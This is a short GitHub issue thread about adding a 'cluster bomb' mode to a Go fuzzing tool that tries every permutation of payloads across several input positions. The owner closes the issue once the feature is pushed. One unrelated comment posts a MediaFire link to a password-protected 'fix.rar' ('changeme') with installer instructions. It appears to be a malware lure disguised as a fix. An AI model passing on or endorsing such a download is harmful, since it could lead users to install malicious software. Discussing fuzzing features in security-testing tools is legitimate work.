### ISSUE TITLE
Support Cluster Bomb Attack

### ISSUE THREAD

**Issue by Matheus2608** [Matheus2608/intruder#4]
### Description of Cluster Bomb Attack
This type of attack needs to have more than one place to dynamically change the input.
It needs so it can test **every permutation** of the payloads inputs. This type of attack is quite common and is demmands a lot of computing power, so Go is a perfect tool to it.
It actually is the reason I want to make this tool lol

## Prerequesites
- [issue3](https://github.com/Matheus2608/intruder/issues/3)
## Objective
- Handle Cluster Bomb Attack
- Extensible code

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Matheus2608** [comment]
Already pushed this change to main branche. Forgot to close this issue. Closing now!
